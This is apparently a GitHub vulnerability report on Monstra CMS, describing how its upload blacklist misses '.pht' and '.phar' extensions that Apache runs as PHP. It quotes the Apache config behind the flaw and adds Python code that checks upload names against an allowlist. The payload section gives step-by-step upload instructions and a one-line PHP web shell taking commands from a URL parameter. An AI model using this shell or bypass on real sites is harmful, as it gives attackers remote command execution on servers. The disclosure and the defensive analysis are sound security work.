Summary of this vulnerability
During upload, Monstra filters some dangerous extensions using a blacklist. The blacklist is incomplete, because the default configuration of "libapache2-mod-php" lets Apache execute several other extensions as PHP scripts.
Test Environment
Apache/2.4.10 (Debian)
PHP 5.6.33-0+deb8u1 (cli)
Affected version
<=3.0.4
Payload
Log in and go to http://[address]:[port]/[app_path]/admin/index.php?id=filesmanager
Save PHP code with a '.pht' extension and upload it, like below.
```php
# cmd.pht
<?php system($_GET['c']);?>
```
Click the uploaded file name, or go to http://[address]:[port]/[app_path]/public/uploads/[uploaded file]
Profit!
Reason for This Vulnerability
The default configuration of the PHP 5 module for Apache 2 (libapache2-mod-php5) lets several extensions execute as PHP scripts. This is part of /etc/apache2/mods-enabled/php5.conf:
```apache
#/etc/apache2/mods-enabled/php5.conf
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
    SetHandler application/x-httpd-php-source
    # Deny access to raw php sources by default
    # To re-enable it's recommended to enable access to the files
    # only in specific virtual host or directory
    Require all denied
</FilesMatch>
```
Because of this config, the extensions that run as PHP scripts are php, php3, php4, php5, **pht** and phtml, and the 'phps' extension is mapped to the handler that displays PHP source (access to it is denied by default in the config above).
Monstra does try to block PHP-style files with an extension filter in the upload process, in ./plugins/box/filesmanager/filesmanager.admin.php, like below.
Most of the extensions that execute as PHP are filtered, but 'pht' is not.
As a result, an attacker can upload a malicious PHP file using the pht extension.
Similarly, the default configuration of 'libapache2-mod-php7.1' looks like this:
```apache
#OS:ubuntu 17.10
#/etc/apache2/mods-enabled/php7.1.conf
<FilesMatch ".+\.ph(ar|p|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
    SetHandler application/x-httpd-php-source
    # Deny access to raw php sources by default
    # To re-enable it's recommended to enable access to the files
    # only in specific virtual host or directory
    Require all denied
</FilesMatch>
```
So the phar extension can also be vulnerable in a PHP 7 environment.
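To make the gap concrete from the defender's side, here is an added Python example (not Monstra's code and not part of the report) that runs the two FilesMatch patterns quoted above against candidate upload names, reports which server-executable extensions a blacklist misses, and shows the allowlist-plus-handler check an upload filter should use instead. The blacklist and allowlist sets are constructed assumptions, not Monstra's actual lists; the regex bodies are the ones from the two configs.

```python
import re

# Handler regexes copied from the two Apache configs quoted in the report;
# the mapping itself is constructed for this example.
HANDLER_PATTERNS = {
    "php5.conf": re.compile(r".+\.ph(p[345]?|t|tml)$"),
    "php7.1.conf": re.compile(r".+\.ph(ar|p|tml)$"),
}
# Source-display handler, also from the quoted configs.
SOURCE_PATTERN = re.compile(r".+\.phps$")

# Constructed stand-in for an extension blacklist (NOT Monstra's real list):
# it knows the usual PHP names but, as the report describes, misses
# 'pht' and 'phar'.
EXAMPLE_BLACKLIST = {"php", "php3", "php4", "php5", "phtml", "phps"}

# Constructed allowlist of extensions an upload form actually needs.
EXAMPLE_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Constructed set of names to probe the handler patterns with.
CANDIDATE_EXTENSIONS = [
    "php", "php3", "php4", "php5", "pht", "phtml", "phar", "phps",
    "txt", "jpg", "html",
]


def apache_runs_as_php(filename, config):
    """True if the config's FilesMatch would hand this file to the PHP handler.

    FilesMatch is case-sensitive unless the pattern says (?i); these do not."""
    return HANDLER_PATTERNS[config].search(filename) is not None


def blacklist_gaps(blacklist, config):
    """Extensions the server executes as PHP that the blacklist lets through."""
    return [
        ext for ext in CANDIDATE_EXTENSIONS
        if ext not in blacklist and apache_runs_as_php(f"upload.{ext}", config)
    ]


def safe_to_store(filename, allowlist=EXAMPLE_ALLOWLIST):
    """Allowlist check plus a defence-in-depth check against every handler.

    Only the final extension counts. The lowercased name is tested against
    every known handler pattern (stricter than Apache's case-sensitive
    default) and refused if any would match, whatever the allowlist says."""
    base = filename.rsplit("/", 1)[-1]
    if "." not in base:
        return False
    lowered = base.lower()
    ext = lowered.rsplit(".", 1)[1]
    if ext not in allowlist:
        return False
    if any(p.search(lowered) for p in HANDLER_PATTERNS.values()):
        return False
    if SOURCE_PATTERN.search(lowered):
        return False
    return True


if __name__ == "__main__":
    for config in HANDLER_PATTERNS:
        print(config, "blacklist misses:", blacklist_gaps(EXAMPLE_BLACKLIST, config))
    for name in ["cmd.pht", "cmd.phar", "photo.jpg", "notes.txt"]:
        print(name, "->", "accept" if safe_to_store(name) else "reject")
```

Run stand-alone, the gap report names `pht` for the php5 config and `phar` for the php7.1 config, which is exactly the mismatch the report describes: the set of extensions Apache executes is decided by the server config, not by the application, so any blacklist drifts out of date the moment the module's FilesMatch changes. An allowlist of the few types the form needs, with the handler patterns as a second check, does not have that problem.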
Hexife changed the title from "'pht' extension can bypassed extension filter in uploading process" to "Some extension can bypassed extension filter in uploading process" on Jan 29, 2018.